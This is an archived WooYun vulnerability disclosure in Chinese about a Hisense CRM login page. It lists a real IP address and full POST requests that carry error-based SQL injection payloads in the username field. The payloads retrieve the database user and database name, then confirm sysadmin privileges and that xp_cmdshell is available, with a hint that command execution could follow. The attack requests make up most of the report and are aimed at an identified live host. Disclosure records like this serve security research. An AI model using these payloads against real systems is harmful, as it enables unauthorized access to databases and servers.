乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-29: 细节已通知厂商并且等待厂商处理中 2015-01-03: 厂商已经主动忽略漏洞,细节向公众公开
rt
海信的一个crm系统。注入点在登陆处:http://221.215.1.144/login.aspx报错注入
获取当前用户名为:dbopost请求内容:
__VIEWSTATE=%2FwEPDwULLTExNTc2NTI3OTlkZOXpqcJA2joagVHNhhCKWuJe0SPu&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWBAKhrJKDBgKGzaPbCgLvi6XRBQLjn%2B3cBDwPpACQ3KO9HBdMLPxvTU0YCGVJ&Tbx_UserName=admin'%20and%201=quotename%28user%29--%20&Tbx_Password=123456&Btn_Login=%E7%99%BB%E5%BD%95
获取当前数据库:SavorCRMpost请求内容:
__VIEWSTATE=%2FwEPDwULLTExNTc2NTI3OTlkZOXpqcJA2joagVHNhhCKWuJe0SPu&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWBAKhrJKDBgKGzaPbCgLvi6XRBQLjn%2B3cBDwPpACQ3KO9HBdMLPxvTU0YCGVJ&Tbx_UserName=admin'%20and%201=quotename%28db_name()%29--%20&Tbx_Password=123456&Btn_Login=%E7%99%BB%E5%BD%95
以下两个请求均无数据库错误,说明为sysadmin权限,以及xp_cmd存在
__VIEWSTATE=%2FwEPDwULLTExNTc2NTI3OTlkZOXpqcJA2joagVHNhhCKWuJe0SPu&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWBAKhrJKDBgKGzaPbCgLvi6XRBQLjn%2B3cBDwPpACQ3KO9HBdMLPxvTU0YCGVJ&Tbx_UserName=admin'%20and%201=(select/**/IS_SRVROLEMEMBER('sysadmin'))--%20&Tbx_Password=123456&Btn_Login=%E7%99%BB%E5%BD%95
__VIEWSTATE=%2FwEPDwULLTExNTc2NTI3OTlkZOXpqcJA2joagVHNhhCKWuJe0SPu&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWBAKhrJKDBgKGzaPbCgLvi6XRBQLjn%2B3cBDwPpACQ3KO9HBdMLPxvTU0YCGVJ&Tbx_UserName=admin'%20and%201=(Select/**/count(*)/**/FROM master..sysobjects/**/Where/**/xtype='X'/**/AND/**/name='xp_cmdshell')--%20&Tbx_Password=123456&Btn_Login=%E7%99%BB%E5%BD%95
不深入了。
你们懂
危害等级:无影响厂商忽略
忽略时间:2015-01-03 09:48
暂无